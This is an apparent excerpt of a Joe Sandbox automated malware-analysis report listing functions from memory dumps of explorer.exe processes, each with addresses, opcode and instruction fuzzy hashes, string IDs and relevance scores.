Opcode Fuzzy Hash: f3f84730ae44954a3a208acbbd071df30e9318f845b99df73f865e36c1751d1c
Instruction Fuzzy Hash: 5521F57190C66E8EE786EB7888055F8BBF0FF55710F0646B2D04DCB093EE246A49C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC0180338E Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54cb91096eba8e3d1e285fa6df1ce9d8f94c22b1bbb3c7e4164aa8e59c850c4f
Instruction ID: 9c470f33a67f7c1c99fac3c45d36c91fd17c1b4f084f53799d91366f7102af7c
Opcode Fuzzy Hash: 54cb91096eba8e3d1e285fa6df1ce9d8f94c22b1bbb3c7e4164aa8e59c850c4f
Instruction Fuzzy Hash: 4D11C83084D65E8FE782EB7488885E97FE4FF16700F0605B6D408C71A2DE389549C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC01800D1D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df3a61b756e63f8a7d2bf26218b878e5ed80eae95f4cd3ea179ac600907ae27
Instruction ID: f4a462f2f01be84aa923f37bbcaf338efaaf53659ec0055ce620f29aad5248d5
Opcode Fuzzy Hash: 7df3a61b756e63f8a7d2bf26218b878e5ed80eae95f4cd3ea179ac600907ae27
Instruction Fuzzy Hash: DF110331D0C55D8EEB96DB688859BFCBBE0FF25701F0102BAD809C64D2DA356649C321

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC0180997D Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c9deeb3879d6e4ac88308ec8e35e96761a0f153be152e0a96a9c69e234bd3b0
Instruction ID: fb54564261b94fdc23621743a466b2e2767e22171c1c51cfa00bfef8ac5c77cc
Opcode Fuzzy Hash: 1c9deeb3879d6e4ac88308ec8e35e96761a0f153be152e0a96a9c69e234bd3b0
Instruction Fuzzy Hash: 42118E7090865E8FDB89EF18C499ABE7BA0FF68305F0102AAD40DC7162DA34A545CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC01802DCA Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2670fa7d1e94c7fa9819068a567ce7b1c8e4c920aec1c0ea844a952c53c6973
Instruction ID: 001529e9aeee8bf8b36877cab360deb936a5139e445408e087f0f6ca10b996aa
Opcode Fuzzy Hash: a2670fa7d1e94c7fa9819068a567ce7b1c8e4c920aec1c0ea844a952c53c6973
Instruction Fuzzy Hash: EF019630C4D65E8FEB92EB34884D5A9BBF1EF46700F0645BAD408C7093DE74A959C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC018034A5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66fbe4490eebd8eb70c15414fba17de590f2c6fdc94acc63bfee28093058f252
Instruction ID: af2d6dd278a250e0e30cbee62142cdacb4831587e59b9825f3b8b37aed5059ac
Opcode Fuzzy Hash: 66fbe4490eebd8eb70c15414fba17de590f2c6fdc94acc63bfee28093058f252
Instruction Fuzzy Hash: 3A11863490855D8FDB96DF2484595BDBBE0FF15704F0105BED419C7191DA356545C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC01809F11 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55362157d36f90f009d15b3164a8b4fc7164dcd0d13e0edf4d8163182e55a3d0
Instruction ID: 8ce2c21f349fc8d67916e2ac85cefb99a3d304d50cf784e5cde61f4046e84e45
Opcode Fuzzy Hash: 55362157d36f90f009d15b3164a8b4fc7164dcd0d13e0edf4d8163182e55a3d0
Instruction Fuzzy Hash: 7F018870D1D65D8FE792EB24C4495B9BBE0EF19B05F4606BAD40CC70A3DE34A649C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC018005F1 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fac077dcd9080afec253256607fccb8495df6a5b5a6762d02a6f8306596a9cf
Instruction ID: c42a287aa7fcc9c8462d873882c1dae04c69cc291123e9fafd6deb569b707b47
Opcode Fuzzy Hash: 0fac077dcd9080afec253256607fccb8495df6a5b5a6762d02a6f8306596a9cf
Instruction Fuzzy Hash: 6701F970C0866E8FE7D2E72848496B9BBE1FF94740F2202B5D018C3092DD34A149C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC018001D0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d4df623ff47b944fbd15f0d941172712130c8659f9deeaa16a1611ed463db9
Instruction ID: 45930155432326bdd1c47cbd61953dcc3431acfa115a30a6d6ed040f477101f9
Opcode Fuzzy Hash: 12d4df623ff47b944fbd15f0d941172712130c8659f9deeaa16a1611ed463db9
Instruction Fuzzy Hash: 2F019E3090891E8FDB99EF24C048ABAB7A1EF58315F61427EE40EC2591CA31E795CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC018027AD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21578dd4b3fc3802771ae7eeb9b4a74966a0607f52df10ba38a2b52266288356
Instruction ID: 5531ea4e6a5abc26561754e5b3b7ba5b23e9d2135d2744bb7ad8179b66d5fa49
Opcode Fuzzy Hash: 21578dd4b3fc3802771ae7eeb9b4a74966a0607f52df10ba38a2b52266288356
Instruction Fuzzy Hash: 2F01753081C65E8FEB92EB24844C5B9BBE1EF59701F4146B6D408C6052DB74A145C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC01802E49 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b02d57d0b8e845c660af309fadf50364514f99d3e43ae378b434c567004021
Instruction ID: ad28adedb056613d4f7c114c99a47abc36909c95d0feb30bbcb67a047cb118f1
Opcode Fuzzy Hash: c5b02d57d0b8e845c660af309fadf50364514f99d3e43ae378b434c567004021
Instruction Fuzzy Hash: DE01D43084D65E8FE792EB34844C5A9BBE1EF5A700F4606F3C00CCB0A3DA78A949C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC0180A329 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee52367879968c798b4272b48754422c42728e3aa042af5d30f93781f44a0338
Instruction ID: 68556d986a822cdb483d77a60731614665e459e39b89adee72d8786c64cda585
Opcode Fuzzy Hash: ee52367879968c798b4272b48754422c42728e3aa042af5d30f93781f44a0338
Instruction Fuzzy Hash: 9301D83194D79D8FE796EB3484595A9BBE0EF45700F4706F6D008C70A2DD64A548C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC01800208 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49b2031c2f3d6af67c85aa07fbcb4fa86db65f1a9fedb7a4ebc070235b3b0624
Instruction ID: effca5a449c0d3168d47306aa09f8d64c47f53c8adb75fc5b72692e83e83383a
Opcode Fuzzy Hash: 49b2031c2f3d6af67c85aa07fbcb4fa86db65f1a9fedb7a4ebc070235b3b0624
Instruction Fuzzy Hash: 2801D13091961E8FEB99EF24805C6BAB3A1FF18705F51057EE40EC21D1DF75A245C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC01800200 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69486c2482a79e04d413f0cf20fde4c7b47d0254073a1c6867c44de8c488f26c
Instruction ID: 51314ffea6f1e685713082c644d961d436f4635e2fa6531432706a93578028c4
Opcode Fuzzy Hash: 69486c2482a79e04d413f0cf20fde4c7b47d0254073a1c6867c44de8c488f26c
Instruction Fuzzy Hash: EF016D3081852E8FEB99EF24845D6BAB7A1FF18705F51057EE40EC2191DF75A259CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC01800D30 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaa45ba9d66080cc01ee7985a0398a65ce7defaf404beaaf270153f4db83c76d
Instruction ID: aa42667e79c270f64573bec1448e4d01c2221a4e39584dc4233fab60353ccbf7
Opcode Fuzzy Hash: eaa45ba9d66080cc01ee7985a0398a65ce7defaf404beaaf270153f4db83c76d
Instruction Fuzzy Hash: 9BF0FF31D1C52E8EEBE69B68A808BFDB7E0FB15715F00033AE81CC24C1DB742249C222

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC018001C8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b17e0758b6894398058b37259b656734c63c1d413816910610b055f83bf8468
Instruction ID: 952a43758162711c7d74f04be6c06962b0cc132d2ec2013b367cb75af3c1eb0d
Opcode Fuzzy Hash: 2b17e0758b6894398058b37259b656734c63c1d413816910610b055f83bf8468
Instruction Fuzzy Hash: 52F0C23090D61E8FEB95EF2494096FAB7A0EF05314F51023AE40DC2591CA35E795CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC018026C9 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb378affce997a2d227c05586aa415e546c1defcc1bf5b7af617af7baf692ee
Instruction ID: bce46bde0e6294b0c95ab8f92740e7db37f6ccafb0e36ea72ec6c029fae3e39b
Opcode Fuzzy Hash: 8cb378affce997a2d227c05586aa415e546c1defcc1bf5b7af617af7baf692ee
Instruction Fuzzy Hash: E7F0223080D39E8FE7AA8F2088591B97FA0FF06210F4202BAD818C20D2DB78A549C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC0180273D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.385436592.00007FFC01800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffc01800000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10875c515b79e3ba559959f7ef0ab20d68eabb65e00311aaae75de4ba395007
Instruction ID: 51ded7269fa023ccc4e1f146c556cbc81536541a3916eeda0e6a73cf6c32f0fd
Opcode Fuzzy Hash: c10875c515b79e3ba559959f7ef0ab20d68eabb65e00311aaae75de4ba395007
Instruction Fuzzy Hash: DDF0243081E38E8FEB9AAF2088182B9BBA1FF05701F4105BEE808C20D2DB799519C711

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 5580, Parent PID: 848COMMON

Executed Functions

Function 00007FFC017E354B Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

jt\_, xrefs: 00007FFC017E363B
jt\_, xrefs: 00007FFC017E3681
jt\_, xrefs: 00007FFC017E365E

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID: jt\_$jt\_$jt\_
API String ID: 0-1201605121
Opcode ID: c9f8b706338e14cdbecb15815eac8a67a44edaae619100e9866dd5a042c916ed
Instruction ID: 49327758187128044a16484b1d7dbe3593b9a463ac6963120aaa2a896914b92f
Opcode Fuzzy Hash: c9f8b706338e14cdbecb15815eac8a67a44edaae619100e9866dd5a042c916ed
Instruction Fuzzy Hash: EB417B7190895E8FEB98EB6CD8956BDBBE1FF19710F5401B9D00ED7292DE252802CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E368E Relevance: 2.6, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

Zr\_, xrefs: 00007FFC017E3700
jt\_, xrefs: 00007FFC017E36A4

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID: Zr\_$jt\_
API String ID: 0-676687960
Opcode ID: fe25d2a2ad2dd6ad7fcc944b94122f6df3f96e384356fa2e779890567abd171c
Instruction ID: a2f3d0cd8545f3535486c6ab82f8fad6d0211164004f56e52a0f50c676685f60
Opcode Fuzzy Hash: fe25d2a2ad2dd6ad7fcc944b94122f6df3f96e384356fa2e779890567abd171c
Instruction Fuzzy Hash: 5D41D3B1A5C51E8EEB84DB6CE8553FD7BE1EB4A324F50027AC00DD7686CAB61801CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E67BA Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

jt\_, xrefs: 00007FFC017E5CE9

Memory Dump Source

Source File: 00000020.00000002.384589583.00007FFC017E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e5000_explorer.jbxd

Similarity

API ID:
String ID: jt\_
API String ID: 0-3422377674
Opcode ID: 9652682d6b0e30ffac90a6e85d619fa8a65f2e0ce7e7250111cf0265aa1aee26
Instruction ID: 7f5baa9cb1d67a49117e73447e4fd7147650b9e99e48d78d2690eaaec1504b5c
Opcode Fuzzy Hash: 9652682d6b0e30ffac90a6e85d619fa8a65f2e0ce7e7250111cf0265aa1aee26
Instruction Fuzzy Hash: FA111C3190852E8FEB64DA08C8907F8B3F5EF59741F1042FAC40EE6282DA346AC5CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E5CDE Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

jt\_, xrefs: 00007FFC017E5CE9

Memory Dump Source

Source File: 00000020.00000002.384589583.00007FFC017E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e5000_explorer.jbxd

Similarity

API ID:
String ID: jt\_
API String ID: 0-3422377674
Opcode ID: 04558afc59396f5fbcc8d36d67b8c3b79a09a9492c2d2b2323fd66af6aa6f0c6
Instruction ID: c4934debeedbbe67f3571d91449a31d9576972cd756697c98769cca66e935ae0
Opcode Fuzzy Hash: 04558afc59396f5fbcc8d36d67b8c3b79a09a9492c2d2b2323fd66af6aa6f0c6
Instruction Fuzzy Hash: 6FE0EC71A4C91E8FDFA4DA1CD894AB9B7E5EB58711F1043F5C40DD2206D93159C28F40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F2B55 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672a43bf4ce4a28d0be1f001a3ecf1f85c89305fbbc7e0971093d1b78befcb9d
Instruction ID: c12dfc71670c53b481842542097efe003ee2c29f9a4307e9d93d9252fa551241
Opcode Fuzzy Hash: 672a43bf4ce4a28d0be1f001a3ecf1f85c89305fbbc7e0971093d1b78befcb9d
Instruction Fuzzy Hash: 2BC11D2390E1FA4BE706A72CB8561F9FB60DF4273171801FBD088CA1A7ED15998EC765

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017ECDD9 Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb568a2c091f57aadb43de217149c79b8896b523c860222d4d80e88287b054e1
Instruction ID: 11e0943b29f581bd79cefe8e1bf68076597dc04a418dfb618577e3051afdb5f5
Opcode Fuzzy Hash: fb568a2c091f57aadb43de217149c79b8896b523c860222d4d80e88287b054e1
Instruction Fuzzy Hash: 71D12A71D1866D8FEB98DBA8C4947F8B7E1FF59700F1401BAD00EE3292CA346885CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E20B5 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd5a0f8c417948a201bdf36ce3ee00bb6b2964f6654a2e75a4152c8210446ac8
Instruction ID: 0428bbade548c87757cfb0971480190e35db12c6b25264c9113bfca76a186a7c
Opcode Fuzzy Hash: dd5a0f8c417948a201bdf36ce3ee00bb6b2964f6654a2e75a4152c8210446ac8
Instruction Fuzzy Hash: 90911235E0C66E8FEB59DB2888512B9B7E4EF4A700F0501BAD44DD71D3DE38A902C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E1278 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a44ffdbdc7828eeb29294e7867360ea909a9ecfb136c79358d5f68754d37927
Instruction ID: e6ab9f36c52dc4750e38094334565f3238279aa06840829c38b05fb698b013d8
Opcode Fuzzy Hash: 7a44ffdbdc7828eeb29294e7867360ea909a9ecfb136c79358d5f68754d37927
Instruction Fuzzy Hash: 42810730A0CB9D8FDB48DE2C88565BAB7E1FF99714B5441BED44AC7297CE35A802C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F2EF5 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f3e1c95adfea70ad0bc2d9d656ce4fef30a5e6d2946b920af3322a1f132e47
Instruction ID: e6d7da19e47194bb899fe64595d263186d528a9e74e1d3b98e0600300528d513
Opcode Fuzzy Hash: f8f3e1c95adfea70ad0bc2d9d656ce4fef30a5e6d2946b920af3322a1f132e47
Instruction Fuzzy Hash: 3091E770D1862D8EEBA4EB58C8547ADB7F1FF58701F5041BAD40DE3292DE34AA85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EC160 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5599d8208f843949c590bdd10a490e2557f06060491363e5486604fe241df27
Instruction ID: 0e6452e8348390596011397c8175e1d5c0895cf2cbd9a08643ff672de0893498
Opcode Fuzzy Hash: e5599d8208f843949c590bdd10a490e2557f06060491363e5486604fe241df27
Instruction Fuzzy Hash: 0E51E727A4C56E86EB05BA6CF8461FDF7D4DF56731F00027BD14CC9093DE25648ACAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EC0E8 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1635ec33512065530bfcf96bef8dde5d0e51d12b64093f1e7c9acc81047f6854
Instruction ID: 0ce252dcb45eb85037970c23761ba62d1c60cb7dc015088150b11e6797f89b63
Opcode Fuzzy Hash: 1635ec33512065530bfcf96bef8dde5d0e51d12b64093f1e7c9acc81047f6854
Instruction Fuzzy Hash: A151C32794C52E8AEB057A7CF8461F9F7D4DF46B31F01027BE14CC9193EE15248ACAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EC0F0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e1e016695c3de7e79eb6d93f046d29f63d65c237529ca7b95140e652ca5219
Instruction ID: 3914f8cd4d78a95f3b1224106f12348d807b77d2295cd148b54f994caecdf2be
Opcode Fuzzy Hash: 91e1e016695c3de7e79eb6d93f046d29f63d65c237529ca7b95140e652ca5219
Instruction Fuzzy Hash: 0451C42794C52E8AEB057A7CF8461F9F7D4DF56B31F01027BE14CC9193EE15248ACAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E18BD Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea197ef72a0d3816e2823d740a1c5fbd44c927df1576fb58a6ed9314c2221b80
Instruction ID: fb8cdc94389dbc550bea040a31bfc645c90ed43a6f459a375a84d9419e64dc0e
Opcode Fuzzy Hash: ea197ef72a0d3816e2823d740a1c5fbd44c927df1576fb58a6ed9314c2221b80
Instruction Fuzzy Hash: 7651C330A1CB9D8FDB48DE1C88655BAB7E2FF98714B54417ED44EC7286CE34A802C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017ECF6D Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93749f7aec3d4113913efe7a713e72a26ab82d6c4bcf451dfe9a8e4379867e3e
Instruction ID: 34f5427f1141f7f48ddfd30001388245a300c90594eaf0718d8b58dcba49cb31
Opcode Fuzzy Hash: 93749f7aec3d4113913efe7a713e72a26ab82d6c4bcf451dfe9a8e4379867e3e
Instruction Fuzzy Hash: 2961C77191896DCFEB98EB98C894BF8B7E1FF59304F1401BAD00DE7292CA356881CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F4610 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d98d2f8b7b3d88dee319ec44678cb8fe7d1d5b7b2d672bd304d4fd9040885081
Instruction ID: d65ff7b6e9c2c8f96a247939dc08f2c9012e0ea872431119882b1a0466bc5bc7
Opcode Fuzzy Hash: d98d2f8b7b3d88dee319ec44678cb8fe7d1d5b7b2d672bd304d4fd9040885081
Instruction Fuzzy Hash: 4451FA7090896D8FDF94EB68C855AAEB7F1FF59711F10016ED00EE3296CA356881CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E3165 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 677d6dd13dacf96dfd23b1992af2e40f658231245fd07393b6870088f571bde8
Instruction ID: b4401479ee3d5c96c3bbe1a98293362d3bae4ffa4c79357855bed89d8312f693
Opcode Fuzzy Hash: 677d6dd13dacf96dfd23b1992af2e40f658231245fd07393b6870088f571bde8
Instruction Fuzzy Hash: 52510770D0862E8FEB54EBA8C4956FDB7F5FF58701F50007AD009E7292DA38A946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F2D83 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
